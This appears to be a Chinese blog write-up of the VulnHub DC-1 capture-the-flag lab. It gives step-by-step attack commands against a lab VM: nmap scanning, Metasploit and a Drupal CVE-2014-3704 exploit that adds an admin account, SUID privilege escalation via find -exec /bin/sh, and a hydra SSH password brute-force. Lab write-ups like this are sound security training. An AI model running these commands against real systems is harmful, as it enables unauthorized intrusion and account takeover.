vulnhub-DC1笔记-find提权

发布于 2022-01-05  1946 次阅读


1.nmap -sP 192.168.0.100/24  使用nmap探测主机ip,经过排除我的靶机ip为192.168.0.119

2.nmap -A -p 1-65535 192.168.0.119    探测端口开放

3.访问该ip/robots.txt和UPGRADE.txt,在UPGRADE.txt发现是7.0版本,应该不是最新版本

4.用msf攻击一下,获取权限

5.shell

python -c "import pty;pty.spawn('/bin/bash')"使用交互shell

6.find / -user root -perm -4000 -print 2>/dev/null   这里利用SUID提权;查看具有SUID的二进制可执行文件

注:1.Nmap/Vim/find/Bash/More/Less/Nano/cp这几个是已知的可用来提权的linux可执行的文件

2.find / -name cron.php -exec "/bin/sh" \; 利用find获取root权限shell

7.在flag1中提示看配置文件,百度drupal数据库配置文件,发现位置在/sites/default/srttings.php

8.看配置文件,这里找到了flag2,这里找到了mysql的username、passwd;

9.进入数据库,发现users表,尝试md5破解密码失败,search -f *pass* 看看有没有提示

10.不会用,https://www.exploit-db.com/exploits/34992,这个版本的具有漏洞,使用别人写好的cve-2014-3704,可以任意增加管理员账户

11.python 34992.py -t http://192.168.0.103 -u 123456 -p 123456

12.登录获取flag3  或者/find / -name *flag*

13.参照其他博客flag4藏在/etc/passwd是个用户名 ,之前ip端口扫描开放22端口现在有思路了

14.使用hydar进行服务密码爆破

hydra -l flag4 -P /usr/share/john/password.lst 192.168.0.103 ssh -vV -f

  • -l指定用户名
  • -P指定密码字典文件
  • -vV爆破一次在终端打印一行
  • -f成功爆破密码后,停止爆破
  • -P指定密码文件
  • -p指定密码

15.爆破出来flag4:orange

16.ls 发现flag4,并提示最终flag在root的家目录下

17.查看最终thefinalflag.txt

做得好!!!!

希望你喜欢这个,并学到了一些新的技能。

你可以告诉我你对这次小旅行的看法

通过Twitter与我联系-@DCAU7

 

收获:1.SUID提权

2.火狐插件wappalyzer,用来探测网站信息

 

子夜不哭
最后更新于 2022-01-05